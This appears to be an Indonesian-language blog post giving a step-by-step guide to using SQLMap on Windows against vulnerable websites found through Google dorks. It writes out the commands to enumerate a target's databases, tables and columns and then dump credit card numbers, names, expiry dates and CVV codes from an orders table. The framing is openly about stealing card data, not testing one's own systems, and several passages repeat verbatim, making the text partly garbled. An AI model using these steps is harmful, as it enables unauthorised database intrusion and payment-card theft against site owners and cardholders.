Tutor Pemakaian SQLMap
grin emotikon squint emotikopacman emotikon
oke gaeess ane mau kasih tau gmn cara memakain SQLMap untuk win7 ketika agan udah bosen dgn havij atau tools lain buat inject/dump grin emotikon
1. adalah siap-siap kan bahan
-Dork (cari digugel/buat sendiri)
-greenox/bisa langsung memakai sqlmap cek Disini (cari digugel)
-web vuln (usaha cari)
-SQLmap>>> download http://sqlmap.org/
-phyton >>> download https://www.python.org/download/releases/2.7/
-active phyton >>> http://www.activestate.com/activepython/downloads
-Kopi (beli di warung trus seduh)
-rokok (beli di warung trus bakar)
-dan benih fokus dan sabar grin emotikon
-Dork (cari digugel/buat sendiri)
-greenox/bisa langsung memakai sqlmap cek Disini (cari digugel)
-web vuln (usaha cari)
-SQLmap>>> download http://sqlmap.org/
-phyton >>> download https://www.python.org/download/releases/2.7/
-active phyton >>> http://www.activestate.com/activepython/downloads
-Kopi (beli di warung trus seduh)
-rokok (beli di warung trus bakar)
-dan benih fokus dan sabar grin emotikon
2. jika sudah tersedia semua dan di instal silahkan cari web vuln menggunakan dork yg ada lalu di copas kan ke greenox atau cari manual copas dork di google search web jgn search image karena yg keluar pasti gambar grin emotikon
3. jika sudah cari dan dapat web vuln ,silahkan ingat-ingat dimana agan instal sqlmap dan instal nya harus di C:/ dan agan harus tau juga dimana folder yg menyimpan sqlmap.py nya contoh : berada di folder Downloads-sqlmap-sqlmap dan terdapat sqlmap.py ,jika sudah ingat agan silahkan buka cmd / command prompt.
lalu ketikan perintah tanpa tanda - :
-cd downloads ,cd itu adalah perintah untuk membuka folder dan downloads itu adalah folder yg menyimpan instalan sqlmap.
-cd sqlmap , dan "sqlmap" ini adalah folder pertama yg bila dibuka muncul lagi folder yg menimpan sqlmap.py
-cd sqlmap ,dan "sqlma" yg kedua ini adalah folder kedua yg menyimpan sqlmap.py
-sqlmap.py -u http://www.target.com/order.php?id=0 --dbs
lalu ketikan perintah tanpa tanda - :
-cd downloads ,cd itu adalah perintah untuk membuka folder dan downloads itu adalah folder yg menyimpan instalan sqlmap.
-cd sqlmap , dan "sqlmap" ini adalah folder pertama yg bila dibuka muncul lagi folder yg menimpan sqlmap.py
-cd sqlmap ,dan "sqlma" yg kedua ini adalah folder kedua yg menyimpan sqlmap.py
-sqlmap.py -u http://www.target.com/order.php?id=0 --dbs
4. tunggu smpai muncul data nya, contoh: [*]db12345
[*]information schema
lalu ketikan perintah : sqlmap.py -u http://www.target.com/order.php?id=0 --D db12345 --tables
[*]information schema
lalu ketikan perintah : sqlmap.py -u http://www.target.com/order.php?id=0 --D db12345 --tables
5. lalu tunggu lagi beberapa saat sampai data di table keluar, jika keluar biasanya ada data ,contoh :
*admin
*orders
*customers
*dll
lalu pilih salah 1 data ,misalkan pilih data orders
lalu tuliskan perintah sqlmap.py -u http://www.target.com/order.php?id=0 -D db12345 -T orders --columns
*admin
*orders
*customers
*dll
lalu pilih salah 1 data ,misalkan pilih data orders
lalu tuliskan perintah sqlmap.py -u http://www.target.com/order.php?id=0 -D db12345 -T orders --columns
5. jika sudah mari tunggu lagi beberapa saat dan akan keluar data orders yg berada di --columns, dan contoh:
*cc_numb
*cc_type
*cc_name
*cc_exp
*cc_cvv
*dll pacman emotikon
pilih data mana saja yg akan mau di dump lalu ketikan perintah, contoh:
sqlmap.py -u http://www.target.com/order.php?id=0 -D db12345 -T orders -C cc_numb,cc_type,cc_name,cc_exp,cc_cvv --dump
*cc_numb
*cc_type
*cc_name
*cc_exp
*cc_cvv
*dll pacman emotikon
pilih data mana saja yg akan mau di dump lalu ketikan perintah, contoh:
sqlmap.py -u http://www.target.com/order.php?id=0 -D db12345 -T orders -C cc_numb,cc_type,cc_name,cc_exp,cc_cvv --dump
6. tunggu lagi sampai hasil dump selesai dan anda mendapatkan apa yg anda mau pacman emotikon grin emotikon colonthree emotikon
smoga bermanfaat ya gan...
jika kurang jelas silahkan komeng
maaf jika ada kekeliruan grin emotikon ___TERIMA___KASIH____
jika kurang jelas silahkan komeng
maaf jika ada kekeliruan grin emotikon ___TERIMA___KASIH____
No comments:
Post a Comment